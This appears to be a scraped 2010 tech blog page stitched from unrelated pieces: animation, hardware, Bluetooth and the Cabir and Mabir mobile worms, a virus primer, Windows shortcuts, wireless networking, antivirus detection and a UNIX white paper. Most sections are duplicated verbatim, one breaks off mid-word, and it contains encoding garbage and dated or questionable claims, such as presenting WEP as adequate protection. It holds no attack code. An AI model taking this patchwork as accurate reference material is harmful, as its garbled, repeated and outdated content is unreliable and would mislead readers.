Animation is the rapid display of a sequence of images of 2-D or 3-D artwork or model positions in order to create an illusion of movement. It is an optical illusion of motion due to the phenomenon of persistence of vision, and can be created and demonstrated in a number of ways. The most common method of presenting animation is as a motion picture or video program, although several other forms of presenting animation also exist.
2D animation figures are created and/or edited on the computer using 2D bitmap graphics or created and edited using 2D vector graphics. This includes automated computerized versions of traditional animation techniques such as of tweening, morphing, onion skinning and interpolated rotoscoping.
3D animation are digitally modeled and manipulated by an animator. In order to manipulate a mesh, it is given a digital skeletal structure that can be used to control the mesh. This process is called rigging. Various other techniques can be applied, such as mathematical functions (ex. gravity, particle simulations), simulated fur or hair, effects such as fire and water and the use of Motion capture to name but a few, these techniques fall under the category of 3d dynamics. Many 3D animations are very believable and are commonly used as Visual effects for recent movies.
Saturday, April 17, 2010
computer hardware component
The term computer has brought a revolution in todayĆ¢€™s world. All the tasks that were earlier performed with man power are now being performed more efficiently with the help of computers. Computer has provide a job opportunities to large number of youths and thus have led to an all round development of the society. Due to the coming of computers a new industry known as the computer industry has developed. Various new IT companies have come forward and are engaged in researching, developing and manufacturing of various types of products related to computers. A computer comprises of various components, hardware components being one of them. Computer hardware can be described as the physical features of the computers that include digital circuitry etc. In comparison to software (the parts used within the hardware) computer hardware is not changed or modified much.
output device
input device
computer science the complete reference
output device
input device
computer science the complete reference
Bluetooth theory
What is Bluetooth ?
Bluetooth is a high-speed, low-power microwave wireless link technology, designed to connect phones, laptops, PDAs and other portable equipment together with little or no work by the user.
Bluetooth is the name for a short-range radio frequency (RF) technology that operates at 2.4 GHz and is capable of transmitting voice and data. The effective range of Bluetooth devices is 32 feet (10 meters). Bluetooth transfers data at the rate of 1 Mbps, which is from three to eight times the average speed of parallel and serial ports, respectively. It is also known as the IEEE 802.15 standards. It was invented to get rid of wires. Bluetooth is more suited for connecting two point-to-point devices, whereas Wi-Fi is an IEEE standard intended for networking.
When the Cabir mobile worm started to attack mobile devices and used Bluetooth to spread, many people were caught by surprise. It first appeared as a proof-of-concept virus written by the A29 group, was provided to an anti-virus company, and then later appeared in the wild. The worm started spreading from infected mobile phones using the Bluetooth wireless capabilities to search for the next victim and infect it based. This infection was based on a vulnerability in the Bluetooth implementation of several Nokia and Sony Ericsson phones. The virus was not dangerous, however, as it only drained the phone's battery and it still required the user to accept installation of the file. However, it showed that it is possible to write mobiles viruses that spread via Bluetooth, which may encourage a number of virus writers to take the same approach. Future Bluetooth viruses may very well be much more damaging. A good example of the potential damage that can be caused first appeared in Japan in 2001, where the virus blocked the ability to call emergency numbers. Recent vulnerabilities in Java, discovered by famous Polish security researcher Adam Gowdiak, could also be used by mobile virus writers to break the Java mobile security model and get access to the phone's memory, affecting many things including changing the very way the phone works.
Increased popularity of mobile worms and viruses would certainly have an impact on the GSM operator as well. Blocking certain phone numbers and making customers frustrated with any inability to make phone calls on infected handsets would direct cause a lost of revenue. The added possibility of installing a backdoor on the handset would also have an impact on the privacy of the users, as malicious hackers could easily use Bluetooth or GPRS to read the Phonebook, Calendar, any SMS messages, and download photos from the phone.
The recent attack of the newer Mabir worm shows not only that mobile viruses are a growing trend but also that mobile viruses are getting more sophisticated. Cabir used only Bluetooth to spread, whereas its successor Mabir.A uses both Bluetooth and MMS to replicate, which is quite an improvement. The worm also sends an MMS in a reply to any received SMS, which is clever technique to fool the user into installing the received application. However, besides interesting techniques such as this, overall the Mabir worm is still relatively simple and does not use any sophisticated attacks on specific application or system vulnerabilities. Compare this to the most dangerous worms affecting personal computers today, which tend to benefit from vulnerabilities in the PC's operating system or applications in order to propagate. This area has not yet been explored by the mobile virus writers. Could this be a future attack vector for a mobile viruses? This author believes it is quite possible, and that such an approach can even include vulnerabilities in Bluetooth related applications on mobile phones. To prove this point, let's look at some simple yet unpublished vulnerabilities that exist today.
computer networking theory
bluetooth zone
Bluetooth is a high-speed, low-power microwave wireless link technology, designed to connect phones, laptops, PDAs and other portable equipment together with little or no work by the user.
Bluetooth is the name for a short-range radio frequency (RF) technology that operates at 2.4 GHz and is capable of transmitting voice and data. The effective range of Bluetooth devices is 32 feet (10 meters). Bluetooth transfers data at the rate of 1 Mbps, which is from three to eight times the average speed of parallel and serial ports, respectively. It is also known as the IEEE 802.15 standards. It was invented to get rid of wires. Bluetooth is more suited for connecting two point-to-point devices, whereas Wi-Fi is an IEEE standard intended for networking.
When the Cabir mobile worm started to attack mobile devices and used Bluetooth to spread, many people were caught by surprise. It first appeared as a proof-of-concept virus written by the A29 group, was provided to an anti-virus company, and then later appeared in the wild. The worm started spreading from infected mobile phones using the Bluetooth wireless capabilities to search for the next victim and infect it based. This infection was based on a vulnerability in the Bluetooth implementation of several Nokia and Sony Ericsson phones. The virus was not dangerous, however, as it only drained the phone's battery and it still required the user to accept installation of the file. However, it showed that it is possible to write mobiles viruses that spread via Bluetooth, which may encourage a number of virus writers to take the same approach. Future Bluetooth viruses may very well be much more damaging. A good example of the potential damage that can be caused first appeared in Japan in 2001, where the virus blocked the ability to call emergency numbers. Recent vulnerabilities in Java, discovered by famous Polish security researcher Adam Gowdiak, could also be used by mobile virus writers to break the Java mobile security model and get access to the phone's memory, affecting many things including changing the very way the phone works.
Increased popularity of mobile worms and viruses would certainly have an impact on the GSM operator as well. Blocking certain phone numbers and making customers frustrated with any inability to make phone calls on infected handsets would direct cause a lost of revenue. The added possibility of installing a backdoor on the handset would also have an impact on the privacy of the users, as malicious hackers could easily use Bluetooth or GPRS to read the Phonebook, Calendar, any SMS messages, and download photos from the phone.
The recent attack of the newer Mabir worm shows not only that mobile viruses are a growing trend but also that mobile viruses are getting more sophisticated. Cabir used only Bluetooth to spread, whereas its successor Mabir.A uses both Bluetooth and MMS to replicate, which is quite an improvement. The worm also sends an MMS in a reply to any received SMS, which is clever technique to fool the user into installing the received application. However, besides interesting techniques such as this, overall the Mabir worm is still relatively simple and does not use any sophisticated attacks on specific application or system vulnerabilities. Compare this to the most dangerous worms affecting personal computers today, which tend to benefit from vulnerabilities in the PC's operating system or applications in order to propagate. This area has not yet been explored by the mobile virus writers. Could this be a future attack vector for a mobile viruses? This author believes it is quite possible, and that such an approach can even include vulnerabilities in Bluetooth related applications on mobile phones. To prove this point, let's look at some simple yet unpublished vulnerabilities that exist today.
computer networking theory
bluetooth zone
knoew the computer virus
A computer virus is an executable program. Depend on the nature of a virus, it may cause damage of your hard disk contents, and/or interfere normal operation of your computer.
By definition, a virus program is able to replicate itself. This means that the virus multiplies on a computer by making copies of itself. This replication is intentional; it is part of the virus program. In most cases, if a file that contains virus is executed or copied onto another computer, then that computer will also be "infected" by the same virus.
A virus can be introduced to a computer system along with any software program. For Internet users, this threat can come from downloading files through FTP (file transfer protocol), or referencing email attachments. (Please refer to our web page on Handling Email's File Attachments for details.)
When a virus is introduced to a computer system, it can attach itself to, or sometimes even replace, an existing program. Thus, when the user runs the program in question, the virus is also executed. This usually happens without the user being aware of it.
A virus program contains instructions to initiate some sort of "event" that affects the infected computer. Each virus
has an unique event associated with it. These events and their effects can range from harmless to devastating. For examples:
* An annoying message appearing on the computer screen.
* Reduced memory or disk space.
* Modification of data.
* Files overwritten or damaged.
* Hard drive erased.
computer science world
By definition, a virus program is able to replicate itself. This means that the virus multiplies on a computer by making copies of itself. This replication is intentional; it is part of the virus program. In most cases, if a file that contains virus is executed or copied onto another computer, then that computer will also be "infected" by the same virus.
A virus can be introduced to a computer system along with any software program. For Internet users, this threat can come from downloading files through FTP (file transfer protocol), or referencing email attachments. (Please refer to our web page on Handling Email's File Attachments for details.)
When a virus is introduced to a computer system, it can attach itself to, or sometimes even replace, an existing program. Thus, when the user runs the program in question, the virus is also executed. This usually happens without the user being aware of it.
A virus program contains instructions to initiate some sort of "event" that affects the infected computer. Each virus
has an unique event associated with it. These events and their effects can range from harmless to devastating. For examples:* An annoying message appearing on the computer screen.
* Reduced memory or disk space.
* Modification of data.
* Files overwritten or damaged.
* Hard drive erased.
computer science world
look at shortcuts
Accessibility Keyboard Shortcuts
1) Right SHIFT for eight seconds (Switch FilterKeys either on or off)
2) Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
3) Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
4) SHIFT five times (Switch the StickyKeys either on or off)
5) NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
6) Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
1) END (Display the bottom of the active window)
2) HOME (Display the top of the active window)
3) NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
4) NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
5) NUM LOCK+Minus sign (-) (Collapse the selected folder)
6) LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
7) RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
1) RIGHT ARROW (Move to the right or to the beginning of the next line)
2) LEFT ARROW (Move to the left or to the end of the previous line)
3) UP ARROW (Move up one row)
4) DOWN ARROW (Move down one row)
5) PAGE UP (Move up one screen at a time)
6) PAGE DOWN (Move down one screen at a time)
7) HOME (Move to the beginning of the line)
8) END (Move to the end of the line)
9) CTRL+HOME (Move to the first character)
10) CTRL+END (Move to the last character)
11) SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
1) CTRL+O (Open a saved console)
2) CTRL+N (Open a new console)
3) CTRL+S (Save the open console)
4) CTRL+M (Add or remove a console item)
5) CTRL+W (Open a new window)
6) F5 key (Update the content of all console windows)
7) ALT+SPACEBAR (Display the MMC window menu)
8) ALT+F4 (Close the console)
9) ALT+A (Display the Action menu)
10) ALT+V (Display the View menu)
11) ALT+F (Display the File menu)
12) ALT+O (Display the Favorites menu)
13) MMC Console Window Keyboard Shortcuts
14) CTRL+P (Print the current page or active pane)
15) ALT+Minus sign (-) (Display the window menu for the active console window)
16) SHIFT+F10 (Display the Action shortcut menu for the selected item)
17) F1 key (Open the Help topic, if any, for the selected item)
18) F5 key (Update the content of all console windows)
19) CTRL+F10 (Maximize the active console window)
20) CTRL+F5 (Restore the active console window)
21) ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
22) F2 key (Rename the selected item)
23) CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
1) CTRL+ALT+END (Open the m*cro$oft Windows NT Security dialog box)
2) ALT+PAGE UP (Switch between programs from left to right)
3) ALT+PAGE DOWN (Switch between programs from right to left)
4) ALT+INSERT (Cycle through the programs in most recently used order)
5) ALT+HOME (Display the Start menu)
6) CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
7) ALT+DELETE (Display the Windows menu)
8) CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
9) CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
1) CTRL+B (Open the Organize Favorites dialog box)
2) CTRL+E (Open the Search bar)
3) CTRL+F (Start the Find utility)
4) CTRL+H (Open the History bar)
5) CTRL+I (Open the Favorites bar)
6) CTRL+L (Open the Open dialog box)
7) CTRL+N (Start another instance of the browser with the same Web address)
8) CTRL+O (Open the Open dialog box, the same as CTRL+L)
9) CTRL+P (Open the Print dialog box)
10) CTRL+R (Update the current Web page)
11) CTRL+W (Close the current window)
1) Right SHIFT for eight seconds (Switch FilterKeys either on or off)
2) Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
3) Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
4) SHIFT five times (Switch the StickyKeys either on or off)
5) NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
6) Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
1) END (Display the bottom of the active window)
2) HOME (Display the top of the active window)
3) NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
4) NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
5) NUM LOCK+Minus sign (-) (Collapse the selected folder)
6) LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
7) RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
1) RIGHT ARROW (Move to the right or to the beginning of the next line)
2) LEFT ARROW (Move to the left or to the end of the previous line)
3) UP ARROW (Move up one row)
4) DOWN ARROW (Move down one row)
5) PAGE UP (Move up one screen at a time)
6) PAGE DOWN (Move down one screen at a time)
7) HOME (Move to the beginning of the line)
8) END (Move to the end of the line)
9) CTRL+HOME (Move to the first character)
10) CTRL+END (Move to the last character)
11) SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
1) CTRL+O (Open a saved console)
2) CTRL+N (Open a new console)
3) CTRL+S (Save the open console)
4) CTRL+M (Add or remove a console item)
5) CTRL+W (Open a new window)
6) F5 key (Update the content of all console windows)
7) ALT+SPACEBAR (Display the MMC window menu)
8) ALT+F4 (Close the console)
9) ALT+A (Display the Action menu)
10) ALT+V (Display the View menu)
11) ALT+F (Display the File menu)
12) ALT+O (Display the Favorites menu)
13) MMC Console Window Keyboard Shortcuts
14) CTRL+P (Print the current page or active pane)
15) ALT+Minus sign (-) (Display the window menu for the active console window)
16) SHIFT+F10 (Display the Action shortcut menu for the selected item)
17) F1 key (Open the Help topic, if any, for the selected item)
18) F5 key (Update the content of all console windows)
19) CTRL+F10 (Maximize the active console window)
20) CTRL+F5 (Restore the active console window)
21) ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
22) F2 key (Rename the selected item)
23) CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
1) CTRL+ALT+END (Open the m*cro$oft Windows NT Security dialog box)
2) ALT+PAGE UP (Switch between programs from left to right)
3) ALT+PAGE DOWN (Switch between programs from right to left)
4) ALT+INSERT (Cycle through the programs in most recently used order)
5) ALT+HOME (Display the Start menu)
6) CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
7) ALT+DELETE (Display the Windows menu)
8) CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
9) CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
1) CTRL+B (Open the Organize Favorites dialog box)
2) CTRL+E (Open the Search bar)
3) CTRL+F (Start the Find utility)
4) CTRL+H (Open the History bar)
5) CTRL+I (Open the Favorites bar)
6) CTRL+L (Open the Open dialog box)
7) CTRL+N (Start another instance of the browser with the same Web address)
8) CTRL+O (Open the Open dialog box, the same as CTRL+L)
9) CTRL+P (Open the Print dialog box)
10) CTRL+R (Update the current Web page)
11) CTRL+W (Close the current window)
wireless internrt connection
Wireless Internet access, sometimes referred to as a "hot spot," is a local area network (LAN) run by radio waves rather than wires. Wireless Internet access is broadcast from a central hub, which is a hard-wired device that actually brings in the Internet connection. The hub, located at the main computer system or server, broadcasts Internet connectivity to clients, which is basically anyone within receiving range who is equipped with a wireless LAN card.
do you know about open source?
In the home, a desktop system setup for wireless Internet access will broadcast connectivity throughout the immediate area. Any family member with a laptop or desktop in another room can connect wirelessly to the Internet to share the main connection. Neighbors may also be able to access this wireless connection, which is why most wireless LANs are configured with password security. In this case, any machine that wishes to get wireless Internet access must first complete a "handshake" with the LAN, in which the password is requested. If the proper password is not supplied, access is denied. Security protocols for wireless Internet access have improved with Wi Fi Protected Access (WPA) and Wi Fi Protected Access 2 (WPA2) options.
what is backtrack?
While wireless Internet access is very convenient in the home, it can be even more so in the workplace. A wired network can not only be very time consuming to install throughout a building, it is also very expensive. Ethernet cables used to connect client machines might need to be routed through walls, ceilings, and floors. In the past, this disadvantage was sometimes overlooked due to the advantages of greater security and faster data transfer speeds through Ethernet cables.
These advantages have been largely mitigated, however. Wireless LANs can be installed in virtually minutes by nearly anyone, are extremely inexpensive, and can have data transfer rates that rival hard-wired Ethernet LANs. Furthermore, WPA2 encrypts all traffic on the LAN, addressing the problem of eavesdropping.
One of the most popular applications for wireless Internet access is the public hot spot. Internet cafes are one example of places where one can sit with a laptop and sip coffee while cruising the Internet, checking email, or doing research. Cell phones and personal digital assistants (PDAs) equipped with Web browsers can also utilize wireless Internet access points through public hot spots.
Some localities provide free wireless Internet access for residents and visitors. Since wireless LANs use radio waves that distort over long distances, the radius of the signal is limited. The further from the hub, the weaker the signal. Therefore cities that provide access will cover a specific area within the city where people can park to gain access.
Technology for wireless LANs is improving constantly. When designing a new wireless network, the person setting up the network should be sure to get network cards, a hub, and a wireless modem that support the latest protocols and security measures. Instructions should be followed carefully when configuring wireless Internet access.
Networking allows two or more computers to interface with each other, whether in an office, a library or other type of establishment, or at home. Running cables throughout an office or a house can be tedious and time-consuming, however, making wireless networking - a network of interfaced computers that doesn't require any hardwired connection between the computers - the ideal choice for many businesses and homes.
Wireless networking has many uses. Wireless networking at an office or place of business makes it easy to share files, printers, and Internet access between all of the computers. Wireless networking at home or in a home office can enable you to print a file from your laptop without having to go to the printer and hook up to it. Wireless networking also means that you can take your laptop to a place that offers WiFi, known as a "hotspot," and instantly connect to the Internet - a valuable tool for businesspeople, entrepreneurs, and students.
For wireless networking to be possible, all computers connected to the network must have a wireless card. Wireless networking is virtually the same thing as wireless Internet access - except instead of connecting to the Internet, you are connecting to another computer - so if you can already access the Internet wirelessly, wireless networking will be just as easy. Many of the newer laptops on the market come fully equipped for wireless networking, and you can buy a wireless card to upgrade your computer if it doesn't already have wireless networking capabilities.
There are several different kinds of wireless cards available. The first cards on the market were 802.11b, but the standard was eventually upgraded to 802.11g. The latter type of card, being the newest, also has the fastest data transfer, making it the obvious choice for anyone who is serious about wireless networking.
Wireless networking and wireless Internet access may seem dangerous to some people. If the channel is left open, anyone can log on to the network; once on the network, that person could hack into one of the other computers, easily locating personal files containing sensitive information. However, what many people don't realize is that wireless networking and wireless Internet access comes with a feature that protects against such an event: the WEP key. The WEP key is essentially a password that is required before a computer can sign on to the wireless network, which prevents any unauthorized use. If you are unsure of how to set up this feature, you can call the provider of your wireless service or the manufacturer of your wireless modem or router.
do you know about open source?
In the home, a desktop system setup for wireless Internet access will broadcast connectivity throughout the immediate area. Any family member with a laptop or desktop in another room can connect wirelessly to the Internet to share the main connection. Neighbors may also be able to access this wireless connection, which is why most wireless LANs are configured with password security. In this case, any machine that wishes to get wireless Internet access must first complete a "handshake" with the LAN, in which the password is requested. If the proper password is not supplied, access is denied. Security protocols for wireless Internet access have improved with Wi Fi Protected Access (WPA) and Wi Fi Protected Access 2 (WPA2) options.
what is backtrack?
While wireless Internet access is very convenient in the home, it can be even more so in the workplace. A wired network can not only be very time consuming to install throughout a building, it is also very expensive. Ethernet cables used to connect client machines might need to be routed through walls, ceilings, and floors. In the past, this disadvantage was sometimes overlooked due to the advantages of greater security and faster data transfer speeds through Ethernet cables.
These advantages have been largely mitigated, however. Wireless LANs can be installed in virtually minutes by nearly anyone, are extremely inexpensive, and can have data transfer rates that rival hard-wired Ethernet LANs. Furthermore, WPA2 encrypts all traffic on the LAN, addressing the problem of eavesdropping.
One of the most popular applications for wireless Internet access is the public hot spot. Internet cafes are one example of places where one can sit with a laptop and sip coffee while cruising the Internet, checking email, or doing research. Cell phones and personal digital assistants (PDAs) equipped with Web browsers can also utilize wireless Internet access points through public hot spots.
Some localities provide free wireless Internet access for residents and visitors. Since wireless LANs use radio waves that distort over long distances, the radius of the signal is limited. The further from the hub, the weaker the signal. Therefore cities that provide access will cover a specific area within the city where people can park to gain access.
Technology for wireless LANs is improving constantly. When designing a new wireless network, the person setting up the network should be sure to get network cards, a hub, and a wireless modem that support the latest protocols and security measures. Instructions should be followed carefully when configuring wireless Internet access.
Networking allows two or more computers to interface with each other, whether in an office, a library or other type of establishment, or at home. Running cables throughout an office or a house can be tedious and time-consuming, however, making wireless networking - a network of interfaced computers that doesn't require any hardwired connection between the computers - the ideal choice for many businesses and homes.
Wireless networking has many uses. Wireless networking at an office or place of business makes it easy to share files, printers, and Internet access between all of the computers. Wireless networking at home or in a home office can enable you to print a file from your laptop without having to go to the printer and hook up to it. Wireless networking also means that you can take your laptop to a place that offers WiFi, known as a "hotspot," and instantly connect to the Internet - a valuable tool for businesspeople, entrepreneurs, and students.
For wireless networking to be possible, all computers connected to the network must have a wireless card. Wireless networking is virtually the same thing as wireless Internet access - except instead of connecting to the Internet, you are connecting to another computer - so if you can already access the Internet wirelessly, wireless networking will be just as easy. Many of the newer laptops on the market come fully equipped for wireless networking, and you can buy a wireless card to upgrade your computer if it doesn't already have wireless networking capabilities.
There are several different kinds of wireless cards available. The first cards on the market were 802.11b, but the standard was eventually upgraded to 802.11g. The latter type of card, being the newest, also has the fastest data transfer, making it the obvious choice for anyone who is serious about wireless networking.
Wireless networking and wireless Internet access may seem dangerous to some people. If the channel is left open, anyone can log on to the network; once on the network, that person could hack into one of the other computers, easily locating personal files containing sensitive information. However, what many people don't realize is that wireless networking and wireless Internet access comes with a feature that protects against such an event: the WEP key. The WEP key is essentially a password that is required before a computer can sign on to the wireless network, which prevents any unauthorized use. If you are unsure of how to set up this feature, you can call the provider of your wireless service or the manufacturer of your wireless modem or router.
antivirus working concepts
How does anti-virus software work?
An anti-virus software program is a computer program that can be used to scan files to identify and eliminate computer viruses and other malicious software (malware).
Anti-virus software typically uses two different techniques to accomplish this:
* Examining files to look for known viruses by means of a virus dictionary
* Identifying suspicious behavior from any computer program which might indicate infection
Most commercial anti-virus software uses both of these approaches, with an emphasis on the virus dictionary approach.
Virus dictionary approach
In the virus dictionary approach, when the anti-virus software examines a file, it refers to a dictionary of known viruses that have been identified by the author of the anti-virus software. If a piece of code in the file matches any virus identified in the dictionary, then the anti-virus software can then either delete the file, quarantine it so that the file is inaccessible to other programs and its virus is unable to spread, or attempt to repair the file by removing the virus itself from the file.
To be successful in the medium and long term, the virus dictionary approach requires periodic online downloads of updated virus dictionary entries. As new viruses are identified "in the wild", civically minded and technically inclined users can send their infected files to the authors of anti-virus software, who then include information about the new viruses in their dictionaries.
Dictionary-based anti-virus software typically examines files when the computer's operating system creates, opens, and closes them; and when the files are e-mailed. In this way, a known virus can be detected immediately upon receipt. The software can also typically be scheduled to examine all files on the user's hard disk on a regular basis.
Although the dictionary approach is considered effective, virus authors have tried to stay a step ahead of such software by writing "polymorphic viruses", which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match the virus's signature in the dictionary.
Suspicious behavior approach
The suspicious behavior approach, by contrast, doesn't attempt to identify known viruses, but instead monitors the behavior of all programs. If one program tries to write data to an executable program, for example, this is flagged as suspicious behavior and the user is alerted to this, and asked what to do.
Unlike the dictionary approach, the suspicious behavior approach therefore provides protection against brand-new viruses that do not yet exist in any virus dictionaries. However, it also sounds a large number of false positives, and users probably become desensitized to all the warnings. If the user clicks "Accept" on every such warning, then the anti-virus software is obviously useless to that user. This problem has especially been made worse over the past 7 years, since many more nonmalicious program designs chose to modify other .exes without regards to this false positive issue. Thus, most modern anti virus software uses this technique less and less.
Other ways to detect viruses
Some antivirus-software will try to emulate the beginning of the code of each new executable that is being executed before transferring control to the executable. If the program seems to be using self-modifying code or otherwise appears as a virus (it immeadeatly tries to find other executables), one could assume that the executable has been infected with a virus. However, this method results in a lot of false positives.
Yet another detection method is using a sandbox. A sandbox emulates the operating system and runs the executable in this simulation. After the program has terminated, the sandbox is analysed for changes which might indicate a virus. Because of performance issues this type of detection is normally only performed during on-demand scans.
Issues of concern
Macro viruses, arguably the most destructive and widespread computer viruses, could be prevented far more inexpensively and effectively, and without the need of all users to buy anti-virus software, if Microsoft would fix security flaws in Microsoft Outlook and Microsoft Office related to the execution of downloaded code and to the ability of document macros to spread and wreak havoc.
User education is as important as anti-virus software; simply training users in safe computing practices, such as not downloading and executing unknown programs from the Internet, would slow the spread of viruses, without the need of anti-virus software.
Computer users should not always run with administrator access to their own machine. If they would simply run in user mode then some types of viruses would not be able to spread.
The dictionary approach to detecting viruses is often insufficient due to the continual creation of new viruses, yet the suspicious behavior approach is ineffective due to the false positive problem; hence, the current understanding of anti-virus software will never conquer computer viruses.
There are various methods of encrypting and packing malicious software which will make even well-known viruses undetectable to anti-virus software. Detecting these "camouflaged" viruses requires a powerful unpacking engine, which can decrypt the files before examining them. Unfortunately, many popular anti-virus programs do not have this and thus are often unable to detect encrypted viruses.
Companies that sell anti-virus software seem to have a financial incentive for viruses to be written and to spread, and for the public to panic over the thr
An anti-virus software program is a computer program that can be used to scan files to identify and eliminate computer viruses and other malicious software (malware).
Anti-virus software typically uses two different techniques to accomplish this:
* Examining files to look for known viruses by means of a virus dictionary
* Identifying suspicious behavior from any computer program which might indicate infection
Most commercial anti-virus software uses both of these approaches, with an emphasis on the virus dictionary approach.
Virus dictionary approach
In the virus dictionary approach, when the anti-virus software examines a file, it refers to a dictionary of known viruses that have been identified by the author of the anti-virus software. If a piece of code in the file matches any virus identified in the dictionary, then the anti-virus software can then either delete the file, quarantine it so that the file is inaccessible to other programs and its virus is unable to spread, or attempt to repair the file by removing the virus itself from the file.
To be successful in the medium and long term, the virus dictionary approach requires periodic online downloads of updated virus dictionary entries. As new viruses are identified "in the wild", civically minded and technically inclined users can send their infected files to the authors of anti-virus software, who then include information about the new viruses in their dictionaries.
Dictionary-based anti-virus software typically examines files when the computer's operating system creates, opens, and closes them; and when the files are e-mailed. In this way, a known virus can be detected immediately upon receipt. The software can also typically be scheduled to examine all files on the user's hard disk on a regular basis.
Although the dictionary approach is considered effective, virus authors have tried to stay a step ahead of such software by writing "polymorphic viruses", which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match the virus's signature in the dictionary.
Suspicious behavior approach
The suspicious behavior approach, by contrast, doesn't attempt to identify known viruses, but instead monitors the behavior of all programs. If one program tries to write data to an executable program, for example, this is flagged as suspicious behavior and the user is alerted to this, and asked what to do.
Unlike the dictionary approach, the suspicious behavior approach therefore provides protection against brand-new viruses that do not yet exist in any virus dictionaries. However, it also sounds a large number of false positives, and users probably become desensitized to all the warnings. If the user clicks "Accept" on every such warning, then the anti-virus software is obviously useless to that user. This problem has especially been made worse over the past 7 years, since many more nonmalicious program designs chose to modify other .exes without regards to this false positive issue. Thus, most modern anti virus software uses this technique less and less.
Other ways to detect viruses
Some antivirus-software will try to emulate the beginning of the code of each new executable that is being executed before transferring control to the executable. If the program seems to be using self-modifying code or otherwise appears as a virus (it immeadeatly tries to find other executables), one could assume that the executable has been infected with a virus. However, this method results in a lot of false positives.
Yet another detection method is using a sandbox. A sandbox emulates the operating system and runs the executable in this simulation. After the program has terminated, the sandbox is analysed for changes which might indicate a virus. Because of performance issues this type of detection is normally only performed during on-demand scans.
Issues of concern
Macro viruses, arguably the most destructive and widespread computer viruses, could be prevented far more inexpensively and effectively, and without the need of all users to buy anti-virus software, if Microsoft would fix security flaws in Microsoft Outlook and Microsoft Office related to the execution of downloaded code and to the ability of document macros to spread and wreak havoc.
User education is as important as anti-virus software; simply training users in safe computing practices, such as not downloading and executing unknown programs from the Internet, would slow the spread of viruses, without the need of anti-virus software.
Computer users should not always run with administrator access to their own machine. If they would simply run in user mode then some types of viruses would not be able to spread.
The dictionary approach to detecting viruses is often insufficient due to the continual creation of new viruses, yet the suspicious behavior approach is ineffective due to the false positive problem; hence, the current understanding of anti-virus software will never conquer computer viruses.
There are various methods of encrypting and packing malicious software which will make even well-known viruses undetectable to anti-virus software. Detecting these "camouflaged" viruses requires a powerful unpacking engine, which can decrypt the files before examining them. Unfortunately, many popular anti-virus programs do not have this and thus are often unable to detect encrypted viruses.
Companies that sell anti-virus software seem to have a financial incentive for viruses to be written and to spread, and for the public to panic over the thr
unix tutorial
Executive Summary
Is it possible for an Information Technology [IT] product to be both mature and state-of-the-art at the same time? In the case of the UNIX® system, the answer is an unqualified "Yes." The UNIX system has continued to develop over the past twenty-five years. In millions of installations running on nearly every hardware platform made, the UNIX system has earned its reputation for stability and scalability. Over the years, UNIX system suppliers have steadily assimilated new technologies so that UNIX systems today provide more functionality as any other operating system.
Perhaps the key to the continuing growth of the UNIX system is the free-market demands placed upon suppliers who produce and support software built to open standards. The "open systems" approach is in bold contrast to other operating environments that lock in their customers with resultant high switching costs. UNIX system suppliers, on the other hand, must constantly provide the highest quality systems in order to retain their customers. Those who become dissatisfied with one UNIX system implementation retain the ability to easily move to another UNIX system implementation.
The continuing success of the UNIX system should come as no surprise. No other operating environment enjoys the support of every major system supplier. Mention the UNIX system and IT professionals immediately think not only of the operating system itself, but also of the large family of application software that the UNIX system supports. In the IT marketplace, the UNIX system has been the catalyst for sweeping changes that have empowered consumers to seek the best-of-breed without the arbitrary constraints imposed by proprietary environments.
In a nutshell then, the UNIX system is the users' and suppliers' operating environment of choice. The UNIX system represents the best collective efforts of competing suppliers, the most refined standards in the public domain, and the rock-solid stability that comes from years of quality assurance testing, mission-critical use, and refinement.
This white paper examines the UNIX system with a special concern for both its extraordinary past and its equally extraordinary prospects for the future.
The UNIX System
The UNIX system has been around for a long time, and many people may remember it as it existed in the previous decades. Many IT professionals who encountered UNIX systems in the past found it uncompromising. While its power was impressive, its command-line interface required technical competence, its syntax was not intuitive, and its interface was unfriendly.
Moreover, in the UNIX system's early days, security was virtually nonexistent. Subsequently, the UNIX system became the first operating system to suffer attacks mounted over the nascent Internet. As the UNIX system matured, however, the organization of security shifted from centralized to distributed authentication and authorization systems.
